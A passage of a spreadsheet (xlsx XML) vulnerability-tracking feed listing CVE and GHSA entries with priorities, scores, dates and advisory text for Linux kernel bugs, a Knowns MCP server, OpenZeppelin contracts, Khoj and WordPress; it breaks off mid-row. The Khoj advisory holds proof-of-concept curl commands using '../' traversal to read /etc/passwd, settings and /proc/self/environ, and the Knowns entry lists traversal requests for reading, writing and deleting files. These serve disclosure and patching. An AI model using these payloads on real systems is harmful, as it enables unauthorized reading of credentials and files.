rule_locs[] without consulting nfc-&gt;rule_cnt, which is how many entries
the caller had room for.  ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN
and the ioctl sizes the buffer from the rule_cnt userspace passes in, so
once an admin has installed CFP rules any user can ask for fewer slots
than there are rules and run off the end of the allocation.  A rule_cnt
of 0 leaves the buffer pointer NULL and the walk dereferences it.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98030</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98041</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't predict JMP32 pointer vs zero comparisons
Consider the following program:
        r1 = map_value;      /* low 32 bits are zero at runtime */
        r6 = 0xdead000000000000;
        if w1 != 0 goto l1;
    l0: r1 += r6;
        r2 = *(u64 *)(r1 + 0);
        exit;
    l1: r6 = 0;
        goto l0;
At the moment is_branch_taken() reports the jump as always taken,
because it does not distinguish between BPF_JMP and BPF_JMP32
comparisons when processing 'if w1 != 0 ...'.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98041</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98083</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix transaction use-after-free in raid stripe insertion
If allocation of a RAID stripe extent fails,
btrfs_insert_one_raid_extent() aborts and ends the transaction before
returning -ENOMEM.
btrfs_finish_one_ordered(), the production caller through
btrfs_insert_raid_extent(), still owns the transaction handle. It handles
the error by aborting the transaction and then reaches the common exit
path, which ends the transaction again.
The premature end can free the handle and drop its transaction reference.
Transaction cleanup can then free the transaction before the caller's
second abort accesses the handle and transaction, resulting in
use-after-free.
Keep the abort at the failure site, but let the caller's common exit path
end the transaction once, after it has finished using both objects.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98083</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98150</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix BPF_F_CPU validation for sparse CPU IDs
BPF_F_CPU stores the target CPU ID in the upper 32 bits of the map
operation flags. bpf_map_check_op_flags() currently compares that ID
with num_possible_cpus(), which is the number of possible CPUs rather
than a bound on CPU IDs.
On an arm64 QEMU guest with a CPU device-tree hole, the possible CPU
mask was 0,2-3. A userspace program using raw bpf() syscalls creates
a BPF_MAP_TYPE_PERCPU_ARRAY and performs update and lookup operations
for each CPU by setting BPF_F_CPU and the CPU ID in the flags.
With the old check, CPU 1 is incorrectly accepted while valid CPU 3 is
rejected with -ERANGE. The CPU 1 update then reaches the per-CPU map
access path and triggers:
  Unable to handle kernel paging request at virtual address ...
  pc : __pi_memcpy_generic+0x5c/0x22c
  lr : bpf_percpu_array_update+0x2dc/0x2e8
  Call trace:
    __pi_memcpy_generic
    bpf_map_update_value
    map_update_elem
    __sys_bpf
Check the CPU ID against nr_cpu_ids and cpu_possible() instead. This
rejects CPU IDs outside the valid range and CPUs absent from the
possible mask, while allowing valid sparse CPU IDs.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98150</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98154</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-rdma: fix -EIO cleanup order in queue_rq
On -EIO, the RDMA queue_rq path reports a host path error and then
still cleans up the command and unmaps the SQE DMA. The path error
helper completes the request, so that is double cleanup and DMA unmap
after the request is already complete.
Unmap the SQE first, then report the host path error. Skip the outer
command cleanup on that path.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98154</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="D224" s="5" t="inlineStr"/>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr">
        <is>
          <t>npm:knowns</t>
        </is>
      </c>
      <c r="M224" s="5" t="inlineStr">
        <is>
          <t>0.30.0</t>
        </is>
      </c>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr"/>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>## Overview
Verified. Multiple **Unrestricted Path Traversal** vulnerabilities exist in the Knowns MCP `docs` and `memory` tools, allowing arbitrary file read, write, and deletion operations outside the project sandbox. The storage layer functions (`Get`, `Create`, `Update`, `Rename`, `Delete`) in both `doc_store.go` and `memory_store.go` concatenate user-controlled paths with `filepath.Join()` without any containment validation. 
Additionally, the `docs.update` action with a `newPath` parameter performs a file deletion via `Rename()`, but is classified as `CapWrite` in the permission registry rather than `CapDelete`. This allows an attacker with a `read-write-no-delete` preset to bypass deletion restrictions and destroy arbitrary files outside the project root.
## Affected paths
| File Path | Role | Vulnerability &amp; Execution Impact |
| :--- | :--- | :--- |
| **`internal/storage/doc_store.go`** | Vulnerable Sink (Docs) | **Path Traversal in File Operations (CWE-22):** `Get()`, `Create()`, `Update()`, `Rename()`, `Delete()` join user-controlled `path` with `filepath.Join(ds.docsDir(), ...)` without validating path containment. |
| **`internal/storage/memory_store.go`** | Vulnerable Sink (Memory) | **Path Traversal in Memory Operations (CWE-22):** `GetInLayer()`, `Create()`, `Update()`, `Delete()` join user-controlled `id` with `filepath.Join(dir, models.MemoryFileName(id))` without validation. |
| **`internal/mcp/handlers/doc.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `path`, `folder`, `newPath` directly to storage layer without sanitization. |
| **`internal/mcp/handlers/memory.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `id` directly to storage layer without sanitization. |
| **`internal/permissions/registry.go`** | Authorization Bypass | **Capability Misclassification (CWE-863):** `docs.update` with `newPath` performs file deletion but is classified as `CapWrite`, bypassing `CapDelete` restrictions. |
## Root Cause
### Missing Path Containment in DocStore
In `internal/storage/doc_store.go`, all file operations use `filepath.Join()` to construct absolute paths without validating that the resolved path remains within `docsDir()`:
```go
// Get retrieves a doc by its relative path (without .md extension).
func (ds *DocStore) Get(path string) (*models.Doc, error) {
    path = strings.TrimPrefix(path, "/")
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    if _, err := os.Stat(absPath); err == nil {
        // ...
        return ds.parseFile(absPath, path, folder, false, "")
    }
    // ...
}
// Create writes a new doc to .knowns/docs/{path}.md.
func (ds *DocStore) Create(doc *models.Doc) error {
    if doc.Path == "" {
        return fmt.Errorf("doc path is required")
    }
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md")
    if err := os.MkdirAll(filepath.Dir(absPath), 0755); err != nil {
        return fmt.Errorf("create doc dir: %w", err)
    }
    return ds.writeFile(absPath, doc)
}
// Rename rewrites a doc to a new path and removes the old file.
func (ds *DocStore) Rename(oldPath string, doc *models.Doc) error {
    // ...
    oldAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(oldPath, ".md"))+".md")
    newAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(doc.Path, ".md"))+".md")
    // ...
    if err := ds.writeFile(newAbsPath, doc); err != nil {
        return err
    }
    if oldAbsPath != newAbsPath {
        // VULNERABLE: Deletes file at oldAbsPath (can be outside docsDir)
        if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
            return err
        }
    }
    return nil
}
// Delete removes a doc file.
func (ds *DocStore) Delete(path string) error {
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    return os.Remove(absPath)
}
```
**Critical Flaws:**
- `filepath.Join` resolves `../` sequences natively
- No post-Join prefix check (e.g., `strings.HasPrefix(absPath, ds.docsDir())`)
- No rejection of absolute paths or path traversal sequences
- `Rename()` performs file deletion via `os.Remove(oldAbsPath)`, which can target files outside the docs directory
### Missing Path Containment in MemoryStore
In `internal/storage/memory_store.go`, memory operations similarly lack path validation:
```go
// GetInLayer retrieves a memory entry by ID from a specific layer only.
func (ms *MemoryStore) GetInLayer(id, layer string) (*models.MemoryEntry, error) {
    // ...
    dir, err := ms.dirForLayer(layer)
    if err != nil {
        return nil, err
    }
    // VULNERABLE: No containment check for id containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(id))
    if _, err := os.Stat(absPath); err != nil {
        return nil, fmt.Errorf("memory %q not found in %s layer", id, layer)
    }
    return ms.parseFile(absPath, layer)
}
// Create writes a new memory entry to the appropriate layer directory.
func (ms *MemoryStore) Create(entry *models.MemoryEntry) error {
    // ...
    dir, err := ms.dirForLayer(entry.Layer)
    if err != nil {
        return err
    }
    if err := os.MkdirAll(dir, 0755); err != nil {
        return fmt.Errorf("create memory dir: %w", err)
    }
    // VULNERABLE: No containment check for entry.ID containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(entry.ID))
    return atomicWrite(absPath, []byte(renderMemory(entry)))
}
// Delete removes a memory entry by ID.
func (ms *MemoryStore) Delete(id string) error {
    // ...
    filename := models.MemoryFileName(id)
    dirs := []string{ms.projectDir(), ms.globalDir()}
    for _, dir := range dirs {
        // VULNERABLE: No containment check
        absPath := filepath.Join(dir, filename)
        if _, err := os.Stat(absPath); err == nil {
            return os.Remove(absPath)
        }
    }
    return fmt.Errorf("memory %q not found", id)
}
```
### Authorization Bypass via Rename-as-Delete
In `internal/mcp/handlers/doc.go`, the `handleDocUpdate()` function accepts a `newPath` parameter that triggers a rename operation:
```go
func handleDocUpdate(getStore func() *storage.Store, req mcp.CallToolRequest) (*mcp.CallToolResult, error) {
    // ...
    if v, ok := stringArg(args, "newPath"); ok &amp;&amp; strings.TrimSpace(v) != "" {
        doc.Path = strings.Trim(strings.TrimSuffix(v, ".md"), "/")
    }
    // ...
    if oldPath != doc.Path {
        if err := store.Docs.Rename(oldPath, doc); err != nil {
            return errFailed("rename doc", err)
        }
        // ...
    }
    // ...
}
```
The `Rename()` function in `doc_store.go` performs file deletion:
```go
if oldAbsPath != newAbsPath {
    if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
        return err
    }
}
```
However, in `internal/permissions/registry.go`, `docs.update` is classified as `CapWrite`:
```go
"docs.update":  {Capability: CapWrite, Target: TargetDoc, Risk: RiskMedium},
```
This allows an attacker with a `read-write-no-delete` preset (which permits `CapWrite` but denies `CapDelete`) to delete files by using `docs.update` with a `newPath` parameter.
## Attack Vector
| Phase | Request / Action | Effect |
| :--- | :--- | :--- |
| **1. Arbitrary File Read** | `docs.get` with `path="../../../victim/secret"` | Server reads file outside project root via path traversal in `DocStore.Get()`. |
| **2. Arbitrary File Write** | `docs.create` with `folder="../../../victim"` | Server writes file outside project root via path traversal in `DocStore.Create()`. |
| **3. Arbitrary File Delete** | `docs.update` with `path="../outside/secret.md"` and `newPath="../../../victim/renamed.md"` | Server deletes file outside project root via path traversal in `DocStore.Rename()`. Bypasses `CapDelete` restriction because `docs.update` is classified as `CapWrite`. |
| **4. Memory File Read/Write** | `memory.update` with `id="x/../../../../victim/secret"` | Server reads and overwrites file outside project root via path traversal in `MemoryStore.Update()`. |
## Analysis
### Classic Path Traversal Pattern
Both `DocStore` and `MemoryStore` follow the same vulnerable pattern: user-controlled input is concatenated with a base directory using `filepath.Join()`, then passed directly to file system operations (`os.ReadFile`, `os.WriteFile`, `os.Remove`, `os.Stat`) without any validation.
```go
absPath := filepath.Join(baseDir, filepath.FromSlash(userInput))
// No containment check: strings.HasPrefix(absPath, baseDir)
// No rejection of ".." or absolute paths
```
`filepath.Join` resolves `../` sequences, allowing attackers to escape the intended directory:
- Input: `"../../../etc/passwd"`
- Result: `/project/.knowns/docs/../../../etc/passwd` → `/etc/passwd`
### Rename-as-Delete Authorization Bypass
The `Rename()` function performs two operations:
1. Write the file to the new location (`newAbsPath`)
2. Delete the file from the old location (`oldAbsPath`)
Both paths are vulnerable to traversal. An attacker can:
- Set `path` to a file outside the project (e.g., `"../../../victim/target.md"`)
- Set `newPath` to another location outside the project
- The `Rename()` function will delete the file at `path` (outside the project)
Because `docs.update` is classified as `CapWrite` rather than `CapDelete`, this operation bypasses deletion restrictions in `read-write-no-delete` presets.
### Compounding Factor - Unauthenticated Access
Due to the previously identified **Auth Bypass** vulnerability, all MCP tools are accessible without credentials when the server is started without a password, making this a zero-credential attack.
## Fix
*Patch is available right now at [New Release](https://github.com/knowns-dev/knowns/releases).*</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
      <c r="D225" s="5" t="inlineStr"/>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr">
        <is>
          <t>npm:@openzeppelin/confidential-contracts</t>
        </is>
      </c>
      <c r="M225" s="5" t="inlineStr">
        <is>
          <t>0.3.2, 0.4.2, 0.5.2</t>
        </is>
      </c>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr"/>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>### Impact
Two locations consume an encrypted handle returned by an untrusted external party and use it without verifying that the party is ACL-authorized on it.
#### `VestingWalletConfidential`
Malicious users can call `release` with a malicious token. This token could return an alternative handle on `confidentialBalanceOf`, which represents the balance of the vesting wallet on an alternative ERC-7984 token (or any other handle that the vesting wallet has access to). The vesting wallet does not check that the token has ACL access and grants access to a new handle derived from the returned handle.
Effectively, this bug allows a malicious user to gain information about any private `euint64` handle that the vesting wallet has access to via a malicious ERC-7984 token. There is no loss of funds.
#### ERC7984
On a transfer with callback, `ERC7984` uses the `ebool` returned by the
recipient's `IERC7984Receiver.onConfidentialTransferReceived` to drive the refund
logic, without checking that the recipient has ACL access to it. A malicious recipient
can return any `ebool` the token has access to and recover its plaintext from the
refund result, which the token grants the caller access to. The leak is limited
to `ebool` handles (the value is only used as an `FHE.select` condition), and
there is no loss of funds.
### Patches
Both issues were fixed in the same patch releases: v0.5.2, v0.4.2, v0.3.2
- `VestingWalletConfidential`: 93e75ceed2b9648f53f9d133f431064353456805 (#423).
- `ERC7984` transfer callback: fe0863af2c9dce7614acce98720a913bf6a767a5 (#428), with follow-up ee47edf189ab681cebdad18bfb53dee541987be2 (#431) permitting an uninitialized returned handle.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
      <c r="D226" s="5" t="inlineStr"/>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr">
        <is>
          <t>PyPI:khoj</t>
        </is>
      </c>
      <c r="M226" s="5" t="inlineStr">
        <is>
          <t>2.0.0-beta.25</t>
        </is>
      </c>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr"/>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `/home/{file_path:path}` endpoint in `web_client.py` serves static files by directly concatenating the user-supplied `file_path` with the `home_directory` constant. There is no path traversal filtering, no path normalization check, and no authentication required. An attacker can use `../` sequences to read arbitrary files from the server filesystem.
### Details
**Vulnerable code** — `src/khoj/routers/web_client.py` lines 46-49:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    """Serve static files from the home landing page directory"""
    return FileResponse(constants.home_directory / file_path)
```
Where `home_directory` is defined in `src/khoj/utils/constants.py` line 6:
```python
home_directory = web_directory / "home/"
```
**What is missing:**
- No `..` traversal filtering
- No path normalization/resolution check (e.g., `resolved.is_relative_to(home_directory)`)
- No authentication decorator (`@requires(["authenticated"])` is absent)
- Starlette's `FileResponse` does NOT perform path traversal protection
**Path resolution:**
```
Request: GET /home/../../../../../../../etc/passwd
file_path = "../../../../../../../etc/passwd"
home_directory / file_path = /app/src/khoj/interface/web/home/../../../../../../../etc/passwd
OS resolves to: /etc/passwd
```
### PoC
```bash
# Read /etc/passwd (no authentication required)
curl http://localhost:42110/home/../../../../../../../etc/passwd
# Read application settings (may contain SECRET_KEY, DB credentials)
curl http://localhost:42110/home/../../../../settings.py
# Read environment file
curl http://localhost:42110/home/../../../../../../../proc/self/environ
```
URL-encoded variant (may bypass some reverse proxy normalization):
```bash
curl http://localhost:42110/home/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
### Impact
Unauthenticated arbitrary file read. An attacker with network access to the Khoj instance can:
- **Read application configuration** — Django `SECRET_KEY`, database credentials, API keys
- **Read system files** — `/etc/passwd`, `/etc/shadow` (if permissions allow), `/proc/self/environ`
- **Exfiltrate sensitive data** — Any file readable by the server process
- **Facilitate further attacks** — Leaked credentials enable deeper compromise
**No authentication required** — the endpoint has no auth decorators, making it exploitable by any network-reachable attacker.
### Recommended fix
Use FastAPI's built-in `StaticFiles` mount instead of a custom handler, or add explicit path validation:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    resolved = (constants.home_directory / file_path).resolve()
    if not resolved.is_relative_to(constants.home_directory.resolve()):
        raise HTTPException(status_code=404)
    return FileResponse(resolved)
```</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87902</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H227" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="I227" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>wordpress:core</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr"/>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R227" s="5" t="inlineStr"/>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>WordPress Core contains a remote file inclusion vulnerability which could allow an unauthenticated attacker to make page-template resolution include a chosen readable local `.php` file outside the active theme directories, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87902</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88351</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
